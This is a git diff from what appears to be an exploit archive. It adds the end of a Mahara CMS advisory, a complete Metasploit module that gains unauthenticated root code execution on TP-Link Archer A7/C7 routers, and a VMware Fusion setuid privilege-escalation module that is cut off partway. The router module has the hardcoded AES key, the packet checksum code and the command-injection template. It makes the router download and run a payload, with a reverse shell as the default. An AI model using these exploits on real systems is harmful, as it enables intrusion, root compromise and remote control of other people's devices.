+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data;
+boundary=---------------------------126319663526561351602937008964
+Content-Length: 3721
+Origin: https://mahara_cms.localhost:8080
+Connection: keep-alive
+Referer:
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
+Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
+folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
+principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
+files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
+files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
+sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
+-
+GET: HTTP/2.0 200 OK
+content-type: text/html; charset=UTF-8
+vary: Accept-Encoding
+cache-control: no-store, no-cache, must-revalidate
+set-cookie:
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
+path=/; secure; HttpOnly
+content-encoding: br
+X-Firefox-Spdy: h2
+
+
+Reference(s):
+https://mahara_cms.localhost:8080/artefact/
+https://mahara_cms.localhost:8080/artefact/file/
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/linux_mips/remote/48331.rb b/exploits/linux_mips/remote/48331.rb
new file mode 100755
index 000000000..c4a71c239
--- /dev/null
+++ b/exploits/linux_mips/remote/48331.rb
@@ -0,0 +1,391 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'openssl'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::Udp
+ include Msf::Exploit::Remote::HttpServer
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on
+ the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
+ The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
+ not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command
+ as root, including downloading and executing a binary from another host.
+ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
+ Radek Domanski).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
+ 'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
+ [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
+ [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
+ [ 'CVE', '2020-10882'],
+ [ 'CVE', '2020-10883'],
+ [ 'CVE', '2020-10884'],
+ [ 'ZDI', '20-334'],
+ [ 'ZDI', '20-335'],
+ [ 'ZDI', '20-336' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE,
+ 'Payload' => {},
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
+ 'WfsDelay' => 15,
+ },
+ 'Targets' =>
+ [
+ [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ]
+ ],
+ 'DisclosureDate' => "Mar 25 2020",
+ 'DefaultTarget' => 0,
+ )
+ )
+ register_options(
+ [
+ Opt::RPORT(20002)
+ ])
+
+ register_advanced_options(
+ [
+ OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15])
+ ])
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri' => '/webpages/app.1564127413977.manifest',
+ 'method' => 'GET',
+ 'rport' => 80
+ })
+
+ if res && res.code == 200
+ return Exploit::CheckCode::Vulnerable
+ end
+ rescue ::Rex::ConnectionError
+ pass
+ end
+ return Exploit::CheckCode::Unknown
+ end
+
+ def calc_checksum(packet)
+ # reference table used to calculate the packet checksum
+ # used by tdpd_pkt_calc_checksum (0x4037f0)
+ # located at offset 0x0416e90 in the binary
+ reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee,
+ 0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4,
+ 0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79,
+ 0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c,
+ 0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d,
+ 0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41,
+ 0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83,
+ 0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9,
+ 0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa,
+ 0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10,
+ 0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b,
+ 0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8,
+ 0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32,
+ 0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d,
+ 0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf,
+ 0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95,
+ 0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6,
+ 0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c,
+ 0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01,
+ 0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85,
+ 0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78,
+ 0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98,
+ 0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6,
+ 0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30,
+ 0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82,
+ 0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9,
+ 0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15,
+ 0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61,
+ 0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a,
+ 0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4,
+ 0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda,
+ 0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c,
+ 0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe,
+ 0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85,
+ 0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29,
+ 0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d,
+ 0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed,
+ 0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2,
+ 0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73,
+ 0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a,
+ 0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a,
+ 0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3,
+ 0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80,
+ 0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b,
+ 0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9,
+ 0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e,
+ 0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f,
+ 0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06,
+ 0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36,
+ 0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf,
+ 0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc,
+ 0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77,
+ 0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5,
+ 0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a,
+ 0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b,
+ 0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3,
+ 0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72,
+ 0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a,
+ 0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5,
+ 0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2,
+ 0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81,
+ 0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47,
+ 0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11,
+ 0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff,
+ 0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e,
+ 0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16,
+ 0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9,
+ 0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae,
+ 0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd,
+ 0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3,
+ 0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23,
+ 0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b,
+ 0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a,
+ 0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]
+
+ res = 0xffffffff
+
+ # main checksum calculation
+ packet.each_entry { |c|
+ index = ((c ^ res) & 0xff) * 4
+ # .reverse is needed as the target is big endian
+ ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first)
+ res = ref ^ (res >> 8)
+ }
+
+ checksum = ~res
+ checksum_s = [(checksum)].pack('I>').force_encoding("ascii")
+
+ # convert back to string
+ packet = packet.pack('C*').force_encoding('ascii')
+
+ # and replace the checksum
+ packet[12] = checksum_s[0]
+ packet[13] = checksum_s[1]
+ packet[14] = checksum_s[2]
+ packet[15] = checksum_s[3]
+
+ packet
+ end
+
+ def aes_encrypt(plaintext)
+ # Function encrypts perfectly 16 bytes aligned payload
+
+ if (plaintext.length % 16 != 0)
+ return
+ end
+
+ cipher = OpenSSL::Cipher.new 'AES-128-CBC'
+ # in the original C code the key and IV are 256 bits long... but they still use AES-128
+ iv = "1234567890abcdef"
+ key = "TPONEMESH_Kf!xn?"
+ encrypted = ''
+ cipher.encrypt
+ cipher.iv = iv
+ cipher.key = key
+
+ # Take each 16 bytes block and encrypt it
+ plaintext.scan(/.{1,16}/) { |block|
+ encrypted += cipher.update(block)
+ }
+
+ encrypted
+ end
+
+ def create_injection(c)
+ # Template for the command injection
+ # The injection happens at "slave_mac" (read advisory for details)
+ # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions.
+
+ # This will fail if we send a command with single quotes (')
+ # ... but that's not a problem for this module, since we don't use them for our command.
+ # It might also fail with double quotes (") since this will break the JSON...
+ inject = "\';printf \'#{c}\'>>#{@cmd_file}\'"
+
+ template = "{\"method\":\"slave_key_offer\",\"data\":{"\
+ "\"group_id\":\"#{rand_text_numeric(1..3)}\","\
+ "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\
+ "\"slave_mac\":\"%{INJECTION}\","\
+ "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\
+ "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\
+ "\"want_to_join\":false,"\
+ "\"model\":\"#{rand_text_alpha(5..13)}\","\
+ "\"product_type\":\"#{rand_text_alpha(5..13)}\","\
+ "\"operation_mode\":\"A%{PADDING}\"}}"
+
+ # This is required to calculate exact template length without replace flags
+ template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length
+ # This has to be initialized to cover the situation when no padding is needed
+ pad = ''
+ padding = rand_text_alpha(16)
+
+ template_len += inject.length
+
+ # Calculate pad if padding is needed
+ if (template_len % 16 != 0)
+ pad = padding[0..15-(template_len % 16)]
+ end
+
+ # Here the final payload is created
+ template % {INJECTION:"#{inject}", PADDING:"#{pad}"}
+ end
+
+ def update_len_field(packet, payload_length)
+ new_packet = packet[0..3]
+ new_packet += [payload_length].pack("S>")
+ new_packet += packet[6..-1]
+ end
+
+ def exec_cmd_file(packet)
+ # This function handles special action of exec
+ # Returns new complete tpdp packet
+ inject = "\';sh #{@cmd_file}\'"
+ payload = create_injection(inject)
+
+ ciphertext = aes_encrypt(payload)
+ if not ciphertext
+ fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
+ end
+
+ new_packet = packet[0..15]
+ new_packet += ciphertext
+ new_packet = update_len_field(new_packet, ciphertext.length)
+
+ calc_checksum(new_packet.bytes)
+ end
+
+ # Handle incoming requests from the router
+ def on_request_uri(cli, request)
+ print_good("#{peer} - Sending executable to the router")
+ print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
+ send_response(cli, @payload_exe)
+ @payload_sent = true
+ end
+
+ def exploit
+ if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+ fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
+ end
+
+ if datastore['SSL']
+ fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it")
+ end
+
+ print_status("Attempting to exploit #{target.name}")
+
+ tpdp_packet_template =
+ [0x01].pack('C*') + # packet version, fixed to 1
+ [0xf0].pack('C*') + # set packet type to 0xf0 (onemesh)
+ [0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table
+ [0x00].pack('S>*') + # packet len
+ [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function
+ [0x00].pack('C*') + # dunno what this is
+ [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value
+ [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder
+
+ srv_host = datastore['SRVHOST']
+ srv_port = datastore['SRVPORT']
+ @cmd_file = rand_text_alpha_lower(1)
+
+ # generate our payload executable
+ @payload_exe = generate_payload_exe
+
+ # Command that will download @payload_exe and execute it
+ download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"
+
+ http_service = 'http://' + srv_host + ':' + srv_port.to_s
+ print_status("Starting up our web service on #{http_service} ...")
+ start_service({'Uri' => {
+ 'Proc' => Proc.new { |cli, req|
+ on_request_uri(cli, req)
+ },
+ 'Path' => "/#{@cmd_file}"
+ }})
+
+ print_status("#{peer} - Connecting to the target")
+ connect_udp
+
+ print_status("#{peer} - Sending command file byte by byte")
+ print_status("#{peer} - Command: #{download_cmd}")
+ mod = download_cmd.length / 5
+
+ download_cmd.each_char.with_index { |c, index|
+ # Generate payload
+ payload = create_injection(c)
+ if not payload
+ fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!")
+ end
+
+ # Encrypt payload
+ ciphertext = aes_encrypt(payload)
+ if not ciphertext
+ fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
+ end
+
+ tpdp_packet = tpdp_packet_template.dup
+ tpdp_packet += ciphertext
+ tpdp_packet = update_len_field(tpdp_packet, ciphertext.length)
+ tpdp_packet = calc_checksum(tpdp_packet.bytes)
+
+ udp_sock.put(tpdp_packet)
+
+ # Sleep to make sure the payload is processed by a target
+ Rex.sleep(1)
+
+ # Print progress
+ if ((index+1) % mod == 0)
+ percentage = 20 * ((index+1) / mod)
+ # very advanced mathemathics in use here to show the progress bar
+ print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]")
+ if percentage == 100
+ # a bit of cheating to get the last char done right
+ index = -2
+ end
+ #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}")
+ end
+ }
+
+ # Send the exec command. From here we should receive the connection
+ print_status("#{peer} - Command file sent, attempting to execute...")
+ tpdp_packet = exec_cmd_file(tpdp_packet_template.dup)
+ udp_sock.put(tpdp_packet)
+
+ timeout = 0
+ while not @payload_sent
+ Rex.sleep(1)
+ timeout += 1
+ if timeout == datastore['MAX_WAIT'].to_i
+ fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(")
+ end
+ end
+
+ disconnect_udp
+ end
+end
\ No newline at end of file
diff --git a/exploits/macos/local/48337.rb b/exploits/macos/local/48337.rb
new file mode 100755
index 000000000..ceca93f31
--- /dev/null
+++ b/exploits/macos/local/48337.rb
@@ -0,0 +1,240 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::OSX::Priv
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
+ 'Description' => %q(
+ This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
+ The Open VMware USB Arbitrator Service can be launched outide of its standard path
+ which allows loading of an attacker controlled binary. By creating a payload in the
+ user home directory in a specific folder, and creating a hard link to the 'Open VMware
+ USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
+ with an effective UID of 0.
+ @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race.
+ Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'h00die', # msf module
+ 'Dhanesh Kizhakkinan', # discovery
+ 'Rich Mirch', # edb module
+ 'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
+ 'grimm'
+ ],
+ 'Platform' => [ 'osx' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'Privileged' => true,
+ 'References' =>
+ [
+ [ 'CVE', '2020-3950' ],
+ [ 'EDB', '48235' ],
+ [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
+ [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
+ [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
+ ],
+ 'DisclosureDate' => 'Mar 17 2020',
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
+ 'WfsDelay' => 15
+ }
+ )
+ )
+
+ register_options [
+ OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
+ ]
+
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false])
+ ]
+ end
+
+ def open_usb_service
+ 'Open VMware USB Arbitrator Service'
+ end
+
+ def usb_service
+ 'VMware USB Arbitrator Service'
+ end
+
+ def get_home_dir
+ home = cmd_exec 'echo ~'
+ if home.blank?
+ fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
+ end
+ home
+ end
+
+ def content_dir
+ "#{get_home_dir}/Contents"
+ end
+
+ def base_dir
+ "#{content_dir}/Library/services/"
+ end
+
+ def kill_process(executable)
+ pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
+ cmd_exec pid_kill
+ end
+
+ def get_version
+ # Thanks to @ddouhine on github for this answer!
+ version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
+ /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
+ if version_raw.blank?
+ fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
+ end
+ Gem::Version.new(version)
+ end
+
+ def pre_11_5_3
+ # Upload payload executable & chmod
+ payload_filename = "#{base_dir}#{usb_service}"
+ print_status "Uploading Payload: #{payload_filename}"
+ write_file payload_filename, generate_payload_exe
+ chmod payload_filename, 0o755
+ register_file_for_cleanup payload_filename
+
+ # create folder structure and hard link to the original binary
+ root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
+ link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
+ cmd_exec "mkdir -p #{link_folder}"
+ cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
+ print_status "Created folder (#{link_folder}) and link"
+
+ print_status 'Starting USB Service (5 sec pause)'
+ # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
+ cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
+ Rex.sleep 5 # give time for the service to execute our payload
+ print_status 'Killing service'
+ cmd_exec "pkill '#{open_usb_service}'"
+ print_status "Deleting #{root_link_folder}"
+ rm_rf root_link_folder
+ end
+
+ def exactly_11_5_3
+ # Upload payload executable & chmod
+ payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
+ print_status "Uploading Payload to #{payload_name}"
+ write_file payload_name, generate_payload_exe
+ chmod payload_name, 0o755
+ #create race with codesign check
+ root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
+ link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
+ print_status 'Uploading race condition executable.'
